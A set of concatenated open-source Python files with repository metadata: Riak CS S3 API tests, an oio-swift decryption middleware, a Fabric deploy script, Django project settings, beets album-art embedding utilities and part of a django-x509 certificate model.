self.assertEqual(key.get_metadata("new-entry"), "NEW")
# TODO: Expires header can be accessed by boto?
# self.assertEqual(key.expires, "Tue, 19 Jan 2038 03:14:07 GMT")
class ContentMd5Test(S3ApiVerificationTestBase):
def test_catches_bad_md5(self):
'''Make sure Riak CS catches a bad content-md5 header'''
key_name = str(uuid.uuid4())
bucket = self.conn.create_bucket(self.bucket_name)
key = Key(bucket, key_name)
s = StringIO('not the real content')
x = compute_md5(s)
with self.assertRaises(S3ResponseError):
key.set_contents_from_string('this is different from the md5 we calculated', md5=x)
def test_bad_md5_leaves_old_object_alone(self):
'''Github #705 Regression test:
Make sure that overwriting an object using a bad md5
simply leaves the old version in place.'''
key_name = str(uuid.uuid4())
bucket = self.conn.create_bucket(self.bucket_name)
value = 'good value'
good_key = Key(bucket, key_name)
good_key.set_contents_from_string(value)
bad_key = Key(bucket, key_name)
s = StringIO('not the real content')
x = compute_md5(s)
try:
bad_key.set_contents_from_string('this is different from the md5 we calculated', md5=x)
except S3ResponseError:
pass
self.assertEqual(good_key.get_contents_as_string(), value)
class SimpleCopyTest(S3ApiVerificationTestBase):
def create_test_object(self):
bucket = self.conn.create_bucket(self.bucket_name)
k = Key(bucket)
k.key = self.key_name
k.set_contents_from_string(self.data)
self.assertEqual(k.get_contents_as_string(), self.data)
self.assertIn(self.key_name,
[k.key for k in bucket.get_all_keys()])
return k
def test_put_copy_object(self):
k = self.create_test_object()
target_bucket_name = str(uuid.uuid4())
target_key_name = str(uuid.uuid4())
target_bucket = self.conn.create_bucket(target_bucket_name)
target_bucket.copy_key(target_key_name, self.bucket_name, self.key_name)
target_key = Key(target_bucket)
target_key.key = target_key_name
self.assertEqual(target_key.get_contents_as_string(), self.data)
self.assertIn(target_key_name,
[k.key for k in target_bucket.get_all_keys()])
def test_put_copy_object_from_mp(self):
bucket = self.conn.create_bucket(self.bucket_name)
(upload, result) = upload_multipart(bucket, self.key_name, [StringIO(self.data)])
target_bucket_name = str(uuid.uuid4())
target_key_name = str(uuid.uuid4())
target_bucket = self.conn.create_bucket(target_bucket_name)
target_bucket.copy_key(target_key_name, self.bucket_name, self.key_name)
target_key = Key(target_bucket)
target_key.key = target_key_name
self.assertEqual(target_key.get_contents_as_string(), self.data)
self.assertIn(target_key_name,
[k.key for k in target_bucket.get_all_keys()])
def test_upload_part_from_non_mp(self):
k = self.create_test_object()
target_bucket_name = str(uuid.uuid4())
target_key_name = str(uuid.uuid4())
target_bucket = self.conn.create_bucket(target_bucket_name)
start_offset=0
end_offset=9
target_bucket = self.conn.create_bucket(target_bucket_name)
upload = target_bucket.initiate_multipart_upload(target_key_name)
upload.copy_part_from_key(self.bucket_name, self.key_name, part_num=1,
start=start_offset, end=end_offset)
upload.complete_upload()
print([k.key for k in target_bucket.get_all_keys()])
target_key = Key(target_bucket)
target_key.key = target_key_name
self.assertEqual(self.data[start_offset:(end_offset+1)],
target_key.get_contents_as_string())
def test_upload_part_from_mp(self):
bucket = self.conn.create_bucket(self.bucket_name)
key_name = str(uuid.uuid4())
(upload, result) = upload_multipart(bucket, key_name, [StringIO(self.data)])
target_bucket_name = str(uuid.uuid4())
target_bucket = self.conn.create_bucket(target_bucket_name)
start_offset=0
end_offset=9
upload2 = target_bucket.initiate_multipart_upload(key_name)
upload2.copy_part_from_key(self.bucket_name, self.key_name, part_num=1,
start=start_offset, end=end_offset)
upload2.complete_upload()
target_key = Key(target_bucket, key_name)
self.assertEqual(self.data[start_offset:(end_offset+1)],
target_key.get_contents_as_string())
def test_put_copy_from_non_existing_key_404(self):
bucket = self.conn.create_bucket(self.bucket_name)
target_bucket_name = str(uuid.uuid4())
target_key_name = str(uuid.uuid4())
target_bucket = self.conn.create_bucket(target_bucket_name)
try:
target_bucket.copy_key(target_key_name, self.bucket_name, 'not_existing')
self.fail()
except S3ResponseError as e:
print e
self.assertEqual(e.status, 404)
self.assertEqual(e.reason, 'Object Not Found')
if __name__ == "__main__":
unittest.main(verbosity=2)
| {
"content_hash": "72cd11b5c652fa19653740b32cab507a",
"timestamp": "",
"source": "github",
"line_count": 862,
"max_line_length": 226,
"avg_line_length": 40.98259860788863,
"alnum_prop": 0.5997678829224106,
"repo_name": "yangchengjian/riak_cs",
"id": "5b43194c043cb250900718f58877f39f626af41d",
"size": "36239",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "client_tests/python/boto_tests/boto_test.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Clojure",
"bytes": "14579"
},
{
"name": "Erlang",
"bytes": "1916866"
},
{
"name": "Makefile",
"bytes": "14501"
},
{
"name": "PHP",
"bytes": "6693"
},
{
"name": "Python",
"bytes": "40046"
},
{
"name": "Ruby",
"bytes": "5458"
},
{
"name": "Shell",
"bytes": "31878"
}
],
"symlink_target": ""
} |
from swift.common.swob import Request, HTTPException, HTTPForbidden
from swift.common.middleware.crypto import decrypter
from swift.common.request_helpers import get_container_update_override_key
from swift.common.utils import config_true_value
from swift.proxy.controllers.base import get_object_info
class DecrypterObjContext(decrypter.DecrypterObjContext):
def get_decryption_keys(self, req, crypto_meta=None):
"""
Determine if a response should be decrypted, and if so then fetch keys.
:param req: a Request object
:returns: a dict of decryption keys
"""
if config_true_value(req.environ.get('swift.crypto.override')):
self.logger.debug('No decryption is necessary because of override')
return None
info = get_object_info(req.environ, self.app, swift_source='DCRYPT')
if 'crypto-etag' not in info['sysmeta']:
# object is not cyphered
return None
key_id = crypto_meta.get('key_id') if crypto_meta else None
try:
return self.get_keys(req.environ, key_id=key_id)
except HTTPException:
# FIXME(FVE): check swift_source, accept if it is internal
# FIXME(FVE): move that code to avoid printing an error
if req.method in ('HEAD', 'GET'):
try:
return self.get_keys(req.environ, ['container'],
key_id=key_id)
except HTTPException:
pass
return None
else:
raise
def decrypt_resp_headers(self, put_keys, post_keys):
"""
Find encrypted headers and replace with the decrypted versions.
:param put_keys: a dict of decryption keys used for object PUT.
:param post_keys: a dict of decryption keys used for object POST.
:return: A list of headers with any encrypted headers replaced by their
decrypted values.
:raises HTTPInternalServerError: if any error occurs while decrypting
headers
:raises HTTPForbidden: if the decryption key is invalid
"""
mod_hdr_pairs = []
if put_keys:
# Decrypt plaintext etag and place in Etag header for client
# response
etag_header = 'X-Object-Sysmeta-Crypto-Etag'
encrypted_etag = self._response_header_value(etag_header)
decrypted_etag = None
if encrypted_etag and 'object' in put_keys:
decrypted_etag = self._decrypt_header(
etag_header, encrypted_etag, put_keys['object'],
required=True)
mod_hdr_pairs.append(('Etag', decrypted_etag))
etag_header = get_container_update_override_key('etag')
encrypted_etag = self._response_header_value(etag_header)
if encrypted_etag and 'container' in put_keys:
dcrypt_etag_override = self._decrypt_header(
etag_header, encrypted_etag, put_keys['container'])
if decrypted_etag and dcrypt_etag_override != decrypted_etag:
self.app.logger.debug('Failed ETag verification')
raise HTTPForbidden('Invalid key')
mod_hdr_pairs.append((etag_header, dcrypt_etag_override))
# The real swift saves the cyphered ETag in the 'ETag' field,
# whereas we store the ETag of the cyphered object.
# The ETag of the cyphered object is of no use for previous
# middlewares, so we replace it with the plaintext ETag.
mod_hdr_pairs.append(('ETag', dcrypt_etag_override))
# Decrypt all user metadata. Encrypted user metadata values are stored
# in the x-object-transient-sysmeta-crypto-meta- namespace. Those are
# decrypted and moved back to the x-object-meta- namespace. Prior to
# decryption, the response should have no x-object-meta- headers, but
# if it does then they will be overwritten by any decrypted headers
# that map to the same x-object-meta- header names i.e. decrypted
# headers win over unexpected, unencrypted headers.
try:
if post_keys:
mod_hdr_pairs.extend(self.decrypt_user_metadata(post_keys))
mod_hdr_names = {h.lower() for h, v in mod_hdr_pairs}
mod_hdr_pairs.extend([(h, v) for h, v in self._response_headers
if h.lower() not in mod_hdr_names])
except KeyError:
self.app.logger.debug('Not able to decrypt user metadata')
return mod_hdr_pairs
class Decrypter(decrypter.Decrypter):
"""Middleware for decrypting data and user metadata."""
def __call__(self, env, start_response):
req = Request(env)
try:
parts = req.split_path(3, 4, True)
except ValueError:
return self.app(env, start_response)
if parts[3] and req.method in ('HEAD', 'GET'):
handler = DecrypterObjContext(self, self.logger).handle
elif parts[2] and req.method == 'GET':
handler = decrypter.DecrypterContContext(self,
self.logger).handle
else:
# url and/or request verb is not handled by decrypter
return self.app(env, start_response)
try:
return handler(req, start_response)
except HTTPException as err_resp:
return err_resp(env, start_response)
| {
"content_hash": "69b1d4df0898c6cb8914cc362914f518",
"timestamp": "",
"source": "github",
"line_count": 125,
"max_line_length": 79,
"avg_line_length": 45.12,
"alnum_prop": 0.5966312056737588,
"repo_name": "open-io/oio-swift",
"id": "9bd49b54dcde1d08bdef6a4699abecea9b716c61",
"size": "6272",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "oioswift/common/middleware/crypto/decrypter.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Lua",
"bytes": "1654"
},
{
"name": "Python",
"bytes": "331417"
},
{
"name": "Shell",
"bytes": "84684"
}
],
"symlink_target": ""
} |
from __future__ import with_statement
from fabric.api import *
from fabric.context_managers import shell_env
env.user = 'django'
env.hosts = ['insomn.io']
def deploy():
code_dir = '/home/django/RSVPBot'
with cd(code_dir):
run('git pull')
run('pip install -r requirements.txt')
run('sudo service rsvp restart') | {
"content_hash": "a3c891f914795f844ff2aacf331c598c",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 45,
"avg_line_length": 24.53846153846154,
"alnum_prop": 0.7084639498432602,
"repo_name": "kokeshii/RSVPBot",
"id": "caf73fe03521287eb58ac2cb1efdb324cf06cbda",
"size": "319",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "fabfile.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "75689"
}
],
"symlink_target": ""
} |
"""
Django settings for group_meeting project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
SETTINGS_DIR = os.path.dirname(__file__)
PROJECT_PATH = os.path.join(SETTINGS_DIR, os.pardir)
PROJECT_PATH = os.path.abspath(PROJECT_PATH)
TEMPLATE_PATH = os.path.join(PROJECT_PATH, 'templates')
STATIC_PATH = os.path.join(PROJECT_PATH, 'static/')
# STATIC_ROOT = os.path.join(PROJECT_PATH, 'static/')
MEDIA_ROOT = os.path.join(PROJECT_PATH, 'media/')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '8$v7k5_=jiyjd=e^flm9!-myv^w&q1w5%tqlff310q#a1zx#lo'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
TEMPLATE_DIRS = (
BASE_DIR + '/templates/',
)
STATIC_DIRS = (
BASE_DIR + '/static/',
)
# Application definition
DEFAULT_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.contenttypes',
]
THIRD_PARTY_APPS = [
'south',
]
LOCAL_APPS = [
'meeting',
]
INSTALLED_APPS = DEFAULT_APPS + THIRD_PARTY_APPS + LOCAL_APPS
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
"django.core.files.uploadhandler.MemoryFileUploadHandler",
"django.core.files.uploadhandler.TemporaryFileUploadHandler",
)
TEMPLATE_CONTEXT_PROCESSORS = (
"django.core.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.static",
"django.core.context_processors.tz",
"django.contrib.messages.context_processors.messages",
# "meeting.processors.base",
)
ROOT_URLCONF = 'group_meeting.urls'
WSGI_APPLICATION = 'group_meeting.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/New_York'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
STATIC_PATH,
)
MEDIA_URL = '/media/'
| {
"content_hash": "bbcc89f41527d3c5ccf42400c7141fac",
"timestamp": "",
"source": "github",
"line_count": 128,
"max_line_length": 71,
"avg_line_length": 25.40625,
"alnum_prop": 0.7158671586715867,
"repo_name": "scavedo159/group_meeting",
"id": "7c51a114035c5f8fb66d7044fbf3bad9efe2142f",
"size": "3252",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "group_meeting/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2114"
},
{
"name": "JavaScript",
"bytes": "92478"
},
{
"name": "Python",
"bytes": "42664"
}
],
"symlink_target": ""
} |
"""High-level utilities for manipulating image files associated with
music and items' embedded album art.
"""
from __future__ import division, absolute_import, print_function
import subprocess
import platform
from tempfile import NamedTemporaryFile
import imghdr
import os
from beets.util import displayable_path, syspath
from beets.util.artresizer import ArtResizer
from beets import mediafile
def mediafile_image(image_path, maxwidth=None):
"""Return a `mediafile.Image` object for the path.
"""
with open(syspath(image_path), 'rb') as f:
data = f.read()
return mediafile.Image(data, type=mediafile.ImageType.front)
def get_art(log, item):
# Extract the art.
try:
mf = mediafile.MediaFile(syspath(item.path))
except mediafile.UnreadableFileError as exc:
log.warning(u'Could not extract art from {0}: {1}',
displayable_path(item.path), exc)
return
return mf.art
def embed_item(log, item, imagepath, maxwidth=None, itempath=None,
compare_threshold=0, ifempty=False, as_album=False):
"""Embed an image into the item's media file.
"""
# Conditions and filters.
if compare_threshold:
if not check_art_similarity(log, item, imagepath, compare_threshold):
log.info(u'Image not similar; skipping.')
return
if ifempty and get_art(log, item):
log.info(u'media file already contained art')
return
if maxwidth and not as_album:
imagepath = resize_image(log, imagepath, maxwidth)
# Get the `Image` object from the file.
try:
log.debug(u'embedding {0}', displayable_path(imagepath))
image = mediafile_image(imagepath, maxwidth)
except IOError as exc:
log.warning(u'could not read image file: {0}', exc)
return
# Make sure the image kind is safe (some formats only support PNG
# and JPEG).
if image.mime_type not in ('image/jpeg', 'image/png'):
log.info('not embedding image of unsupported type: {}',
image.mime_type)
return
item.try_write(path=itempath, tags={'images': [image]})
def embed_album(log, album, maxwidth=None, quiet=False,
compare_threshold=0, ifempty=False):
"""Embed album art into all of the album's items.
"""
imagepath = album.artpath
if not imagepath:
log.info(u'No album art present for {0}', album)
return
if not os.path.isfile(syspath(imagepath)):
log.info(u'Album art not found at {0} for {1}',
displayable_path(imagepath), album)
return
if maxwidth:
imagepath = resize_image(log, imagepath, maxwidth)
log.info(u'Embedding album art into {0}', album)
for item in album.items():
embed_item(log, item, imagepath, maxwidth, None,
compare_threshold, ifempty, as_album=True)
def resize_image(log, imagepath, maxwidth):
"""Returns path to an image resized to maxwidth.
"""
log.debug(u'Resizing album art to {0} pixels wide', maxwidth)
imagepath = ArtResizer.shared.resize(maxwidth, syspath(imagepath))
return imagepath
def check_art_similarity(log, item, imagepath, compare_threshold):
"""A boolean indicating if an image is similar to embedded item art.
"""
with NamedTemporaryFile(delete=True) as f:
art = extract(log, f.name, item)
if art:
is_windows = platform.system() == "Windows"
# Converting images to grayscale tends to minimize the weight
# of colors in the diff score.
convert_proc = subprocess.Popen(
[b'convert', syspath(imagepath), syspath(art),
b'-colorspace', b'gray', b'MIFF:-'],
stdout=subprocess.PIPE,
close_fds=not is_windows,
)
compare_proc = subprocess.Popen(
[b'compare', b'-metric', b'PHASH', b'-', b'null:'],
stdin=convert_proc.stdout,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=not is_windows,
)
convert_proc.stdout.close()
stdout, stderr = compare_proc.communicate()
if compare_proc.returncode:
if compare_proc.returncode != 1:
log.debug(u'IM phashes compare failed for {0}, {1}',
displayable_path(imagepath),
displayable_path(art))
return
out_str = stderr
else:
out_str = stdout
try:
phash_diff = float(out_str)
except ValueError:
log.debug(u'IM output is not a number: {0!r}', out_str)
return
log.debug(u'compare PHASH score is {0}', phash_diff)
return phash_diff <= compare_threshold
return True
def extract(log, outpath, item):
art = get_art(log, item)
if not art:
log.info(u'No album art present in {0}, skipping.', item)
return
# Add an extension to the filename.
ext = imghdr.what(None, h=art)
if not ext:
log.warning(u'Unknown image type in {0}.',
displayable_path(item.path))
return
outpath += b'.' + ext
log.info(u'Extracting album art from: {0} to: {1}',
item, displayable_path(outpath))
with open(syspath(outpath), 'wb') as f:
f.write(art)
return outpath
def extract_first(log, outpath, items):
for item in items:
real_path = extract(log, outpath, item)
if real_path:
return real_path
def clear(log, lib, query):
items = lib.items(query)
log.info(u'Clearing album art from {0} items', len(items))
for item in items:
log.debug(u'Clearing art for {0}', item)
item.try_write(tags={'images': None})
| {
"content_hash": "f73ed04b0499212292fcf0b2bdfffe7f",
"timestamp": "",
"source": "github",
"line_count": 185,
"max_line_length": 77,
"avg_line_length": 32.13513513513514,
"alnum_prop": 0.5962994112699748,
"repo_name": "Freso/beets",
"id": "7a65a2b806efc938720026124634b5031a4dca98",
"size": "6616",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "beets/art.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2951"
},
{
"name": "HTML",
"bytes": "3307"
},
{
"name": "JavaScript",
"bytes": "85950"
},
{
"name": "Python",
"bytes": "1576789"
},
{
"name": "Shell",
"bytes": "7413"
}
],
"symlink_target": ""
} |
import collections
import uuid
from datetime import datetime, timedelta
import OpenSSL
import swapper
from django.core.exceptions import ValidationError
from django.db import models
from django.utils import timezone
from django.utils.functional import cached_property
from django.utils.safestring import mark_safe
from django.utils.translation import gettext_lazy as _
from jsonfield import JSONField
from model_utils.fields import AutoCreatedField, AutoLastModifiedField
from OpenSSL import crypto
from .. import settings as app_settings
generalized_time = '%Y%m%d%H%M%SZ'
utc_time = '%y%m%d%H%M%SZ'
KEY_LENGTH_CHOICES = (
('512', '512'),
('1024', '1024'),
('2048', '2048'),
('4096', '4096'),
)
DIGEST_CHOICES = (
('sha1', 'SHA1'),
('sha224', 'SHA224'),
('sha256', 'SHA256'),
('sha384', 'SHA384'),
('sha512', 'SHA512'),
)
SIGNATURE_MAPPING = {
'sha1WithRSAEncryption': 'sha1',
'sha224WithRSAEncryption': 'sha224',
'sha256WithRSAEncryption': 'sha256',
'sha384WithRSAEncryption': 'sha384',
'sha512WithRSAEncryption': 'sha512',
}
def datetime_to_string(datetime_):
"""
Converts datetime.datetime object to UTCTime/GeneralizedTime string
following RFC5280. (Returns string encoded in UTCtime for dates through year
2049, otherwise in GeneralizedTime format)
"""
if datetime_.year < 2050:
return datetime_.strftime(utc_time)
return datetime_.strftime(generalized_time)
def default_validity_start():
"""
Sets validity_start field to 1 day before the current date
(avoids "certificate not valid yet" edge case).
In some cases, because of timezone differences, when certificates
were just created they were considered valid in a timezone (eg: Europe)
but not yet valid in another timezone (eg: US).
This function intentionally returns naive datetime (not timezone aware),
so that certificates are valid from 00:00 AM in all timezones.
"""
start = datetime.now() - timedelta(days=1)
return start.replace(hour=0, minute=0, second=0, microsecond=0)
def default_ca_validity_end():
"""
returns the default value for validity_end field
"""
delta = timedelta(days=app_settings.DEFAULT_CA_VALIDITY)
return timezone.now() + delta
def default_cert_validity_end():
"""
returns the default value for validity_end field
"""
delta = timedelta(days=app_settings.DEFAULT_CERT_VALIDITY)
return timezone.now() + delta
def default_key_length():
"""
returns default value for key_length field
(this avoids to set the exact default value in the database migration)
"""
return app_settings.DEFAULT_KEY_LENGTH
def default_digest_algorithm():
"""
returns default value for digest field
(this avoids to set the exact default value in the database migration)
"""
return app_settings.DEFAULT_DIGEST_ALGORITHM
class BaseX509(models.Model):
"""
Abstract Cert class, shared between Ca and Cert
"""
name = models.CharField(max_length=64)
notes = models.TextField(blank=True)
key_length = models.CharField(
_('key length'),
help_text=_('bits'),
choices=KEY_LENGTH_CHOICES,
default=default_key_length,
max_length=6,
)
digest = models.CharField(
_('digest algorithm'),
help_text=_('bits'),
choices=DIGEST_CHOICES,
default=default_digest_algorithm,
max_length=8,
)
validity_start = models.DateTimeField(
blank=True, null=True, default=default_validity_start
)
validity_end = models.DateTimeField(
blank=True, null=True, default=default_cert_validity_end
)
country_code = models.CharField(max_length=2, blank=True)
state = models.CharField(_('state or province'), max_length=64, blank=True)
city = models.CharField(_('city'), max_length=64, blank=True)
organization_name = models.CharField(_('organization'), max_length=64, blank=True)
organizational_unit_name = models.CharField(
_('organizational unit name'), max_length=64, blank=True
)
email = models.EmailField(_('email address'), blank=True)
common_name = models.CharField(_('common name'), max_length=64, blank=True)
extensions = JSONField(
_('extensions'),
default=list,
blank=True,
help_text=_('additional x509 certificate extensions'),
load_kwargs={'object_pairs_hook': collections.OrderedDict},
dump_kwargs={'indent': 4},
)
# serial_number is set to CharField as a UUID integer is too big for a
# PositiveIntegerField and an IntegerField on SQLite
serial_number = models.CharField(
_('serial number'),
help_text=_('leave blank to determine automatically'),
blank=True,
null=True,
max_length=48,
)
certificate = models.TextField(
blank=True, help_text='certificate in X.509 PEM format'
)
private_key = models.TextField(
blank=True, help_text='private key in X.509 PEM format'
)
created = AutoCreatedField(_('created'), editable=True)
modified = AutoLastModifiedField(_('modified'), editable=True)
passphrase = models.CharField(
max_length=64,
blank=True,
help_text=_('Passphrase for the private key, if present'),
)
class Meta:
abstract = True
def __str__(self):
return self.name
def clean_fields(self, *args, **kwargs):
# importing existing certificate
# must be done here in order to validate imported fields
# and fill private and public key before validation fails
if self._state.adding and self.certificate and self.private_key:
self._validate_pem()
self._import()
super().clean_fields(*args, **kwargs)
def clean(self):
# when importing, both public and private must be present
if (self.certificate and not self.private_key) or (
self.private_key and not self.certificate
):
raise ValidationError(
_(
'When importing an existing certificate, both'
'keys (private and public) must be present'
)
)
if self.serial_number:
self._validate_serial_number()
self._verify_extension_format()
def save(self, *args, **kwargs):
generate = False
if not self.pk and not self.certificate and not self.private_key:
generate = True
super().save(*args, **kwargs)
if generate:
# automatically determine serial number
if not self.serial_number:
self.serial_number = self._generate_serial_number()
self._generate()
kwargs['force_insert'] = False
super().save(*args, **kwargs)
@cached_property
def x509(self):
"""
returns an instance of OpenSSL.crypto.X509
"""
if self.certificate:
return crypto.load_certificate(crypto.FILETYPE_PEM, self.certificate)
@cached_property
def x509_text(self):
"""
returns a text dump of the information
contained in the x509 certificate
"""
if self.certificate:
text = crypto.dump_certificate(crypto.FILETYPE_TEXT, self.x509)
return text.decode('utf-8')
@cached_property
def pkey(self):
"""
returns an instance of OpenSSL.crypto.PKey
"""
if self.private_key:
return crypto.load_privatekey(
crypto.FILETYPE_PEM,
self.private_key,
passphrase=getattr(self, 'passphrase').encode('utf-8'),
)
def _validate_pem(self):
"""
(internal use only)
validates certificate and private key
"""
errors = {}
for field in ['certificate', 'private_key']:
method_name = 'load_{0}'.format(field.replace('_', ''))
load_pem = getattr(crypto, method_name)
try:
args = (crypto.FILETYPE_PEM, getattr(self, field))
kwargs = {}
if method_name == 'load_privatekey':
kwargs['passphrase'] = getattr(self, 'passphrase').encode('utf8')
load_pem(*args, **kwargs)
except OpenSSL.crypto.Error as e:
error = 'OpenSSL error: <br>{0}'.format(
str(e.args[0]).replace('), ', '), <br>').strip('[]')
)
if 'bad decrypt' in error:
error = '<b>Incorrect Passphrase</b> <br>' + error
errors['passphrase'] = ValidationError(_(mark_safe(error)))
continue
errors[field] = ValidationError(_(mark_safe(error)))
if errors:
raise ValidationError(errors)
def _validate_serial_number(self):
"""
(internal use only)
validates serial number if set manually
"""
try:
int(self.serial_number)
except ValueError:
raise ValidationError(
{'serial_number': _('Serial number must be an integer')}
)
def _generate(self):
"""
(internal use only)
generates a new x509 certificate (CA or end-entity)
"""
key = crypto.PKey()
key.generate_key(crypto.TYPE_RSA, int(self.key_length))
cert = crypto.X509()
subject = self._fill_subject(cert.get_subject())
cert.set_version(0x2) # version 3 (0 indexed counting)
cert.set_subject(subject)
cert.set_serial_number(int(self.serial_number))
cert.set_notBefore(bytes(str(datetime_to_string(self.validity_start)), 'utf8'))
cert.set_notAfter(bytes(str(datetime_to_string(self.validity_end)), 'utf8'))
# generating certificate for CA
if not hasattr(self, 'ca'):
issuer = cert.get_subject()
issuer_key = key
# generating certificate issued by a CA
else:
issuer = self.ca.x509.get_subject()
issuer_key = self.ca.pkey
cert.set_issuer(issuer)
cert.set_pubkey(key)
cert = self._add_extensions(cert)
cert.sign(issuer_key, str(self.digest))
self.certificate = crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode(
'utf-8'
)
key_args = (crypto.FILETYPE_PEM, key)
key_kwargs = {}
if self.passphrase:
key_kwargs['passphrase'] = self.passphrase.encode('utf-8')
key_kwargs['cipher'] = 'DES-EDE3-CBC'
self.private_key = crypto.dump_privatekey(*key_args, **key_kwargs).decode(
'utf-8'
)
def _fill_subject(self, subject):
"""
(internal use only)
fills OpenSSL.crypto.X509Name object
"""
attr_map = {
'country_code': 'countryName',
'state': 'stateOrProvinceName',
'city': 'localityName',
'organization_name': 'organizationName',
'organizational_unit_name': 'organizationalUnitName',
'email': 'emailAddress',
'common_name': 'commonName',
}
# set x509 subject attributes only if not empty strings
for model_attr, subject_attr in attr_map.items():
value = getattr(self, model_attr)
if value:
# coerce value to string, allow these fields to be redefined
# as foreign keys by subclasses without losing compatibility
setattr(subject, subject_attr, str(value))
return subject
def _import(self):
"""
(internal use only)
imports existing x509 certificates
"""
cert = self.x509
# when importing an end entity certificate
if hasattr(self, 'ca'):
self._verify_ca()
self.key_length = str(cert.get_pubkey().bits())
# this line might fail if a certificate with
# an unsupported signature algorithm is imported
algorithm = cert.get_signature_algorithm().decode('utf8')
self.digest = SIGNATURE_MAPPING[algorithm]
not_before = cert.get_notBefore().decode('utf8')
self.validity_start = datetime.strptime(not_before, generalized_time)
self.validity_start = timezone.make_aware(self.validity_start)
not_after = cert.get_notAfter().decode('utf8')
self.validity_end = datetime.strptime(not_after, generalized_time)
self.validity_end.replace(tzinfo=timezone.tzinfo())
self.validity_end = timezone.make_aware(self.validity_end)
subject = cert.get_subject()
self.country_code = subject.countryName or ''
# allow importing from legacy systems which use invalid country codes
if len(self.country_code) > 2:
self.country_code = ''
self.state = subject.stateOrProvinceName or ''
self.city = subject.localityName or ''
self.organization_name = subject.organizationName or ''
self.organizational_unit_name = subject.organizationalUnitName or ''
self.email = subject.emailAddress or ''
self.common_name = subject.commonName or ''
self.serial_number = cert.get_serial_number()
if not self.name:
self.name = self.common_name or str(self.serial_number)
def _verify_ca(self):
"""
(internal use only)
verifies the current x509 is signed
by the associated CA
"""
store = crypto.X509Store()
store.add_cert(self.ca.x509)
store_ctx = crypto.X509StoreContext(store, self.x509)
try:
store_ctx.verify_certificate()
except crypto.X509StoreContextError as e:
raise ValidationError(
_("CA doesn't match, got the " 'following error from pyOpenSSL: "%s"')
% e.args[0][2]
)
def _verify_extension_format(self):
"""
(internal use only)
verifies the format of ``self.extension`` is correct
"""
msg = 'Extension format invalid'
if not isinstance(self.extensions, list):
raise ValidationError(msg)
for ext in self.extensions:
if not isinstance(ext, dict):
raise ValidationError(msg)
if not ('name' in ext and 'critical' in ext and 'value' in ext):
raise ValidationError(msg)
def _add_extensions(self, cert):
"""
(internal use only)
adds x509 extensions to ``cert``
"""
ext = []
# prepare extensions for CA
if not hasattr(self, 'ca'):
pathlen = app_settings.CA_BASIC_CONSTRAINTS_PATHLEN
ext_value = 'CA:TRUE'
if pathlen is not None:
ext_value = '{0}, pathlen:{1}'.format(ext_value, pathlen)
ext.append(
crypto.X509Extension(
b'basicConstraints',
app_settings.CA_BASIC_CONSTRAINTS_CRITICAL,
bytes(str(ext_value), 'utf8'),
)
)
ext.append(
crypto.X509Extension(
b'keyUsage',
app_settings.CA_KEYUSAGE_CRITICAL,
bytes(str(app_settings.CA_KEYUSAGE_VALUE), 'utf8'),
)
)
issuer_cert = cert
# prepare extensions for end-entity certs
else:
ext.append(crypto.X509Extension(b'basicConstraints', False, b'CA:FALSE'))
ext.append(
crypto.X509Extension(
b'keyUsage',
app_settings.CERT_KEYUSAGE_CRITICAL,
bytes(str(app_settings.CERT_KEYUSAGE_VALUE), 'utf8'),
)
)
issuer_cert = self.ca.x509
ext.append(
crypto.X509Extension(b'subjectKeyIdentifier', False, b'hash', subject=cert)
)
cert.add_extensions(ext)
# authorityKeyIdentifier must be added after
# the other extensions have been already added
cert.add_extensions(
[
crypto.X509Extension(
b'authorityKeyIdentifier',
False,
b'keyid:always,issuer:always',
issuer=issuer_cert,
)
]
)
for ext in self.extensions:
cert.add_extensions(
[
crypto.X509Extension(
bytes(str(ext['name']), 'utf8'),
bool(ext['critical']),
bytes(str(ext['value']), 'utf8'),
)
]
)
return cert
def renew(self):
self._generate()
self.serial_number = self._generate_serial_number()
self.validity_end = self.__class__().validity_end
self.save()
def _generate_serial_number(self):
return uuid.uuid4().int
class AbstractCa(BaseX509):
"""
Abstract Ca model
"""
class Meta:
